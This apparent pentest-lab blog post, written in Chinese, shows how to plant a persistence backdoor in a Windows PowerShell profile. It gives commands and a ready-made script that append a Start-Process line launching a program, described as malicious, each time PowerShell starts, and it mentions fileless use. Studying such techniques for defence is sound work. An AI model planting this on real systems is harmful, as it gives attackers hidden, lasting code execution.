Powershell配置文件-持久性后门

  1. 实验过程
  2. 参考链接

powershell配置文件后门,通过设置配置文件后门可以实现每次powershell启动时。执行指定的恶意操作
MkN7Yq.png

实验过程

echo $profile #输出配置文件的路径
Test-Path $profile #判断配置文件是否存在,如果返回为False代表不存在,返回True则存在
New-Item -Path $profile -Type File –Force #新建一个配置文件
$string = 'Start-Process "C:\tmp\pentestlab.exe"' #要启动的恶意程序
$string | Out-File -FilePath "C:\Users\<User>\Documents\WindowsPowerShell\Microsoft.PowerShe
ll_profile.ps1" -Append  #写入配置文件

MkUahq.png

测试结果
MkU03V.gif

自动写入的ps1脚本

Write-Host -NoNewline [*] New powershell config;
New-Item -Path $profile -Type File –Force;
$path=$profile;
Write-Host [*] config path: $path;
$sets=Test-Path $profile;
if($sets -eq "True"){
    Write-Host [*] New config ok;
    $payload='Start-Process "C:\Windows\System32\notepad.exe"'
    $payload | Out-File -FilePath $path;
    Write-Host [+] write powershell config ok !!!
}else{
    Write-Host -NoNewline [-] New config False...;
    exit(1);
}

当然你也可以用这个方法来实现无文件攻击

参考链接

Persistence – PowerShell Profile | Penetration Testing Lab


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:Powershell配置文件-持久性后门

本文作者:九世

发布时间:2019-11-07, 16:12:33

最后更新:2019-11-07, 16:47:41

原始链接:http://422926799.github.io/posts/3327c145.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录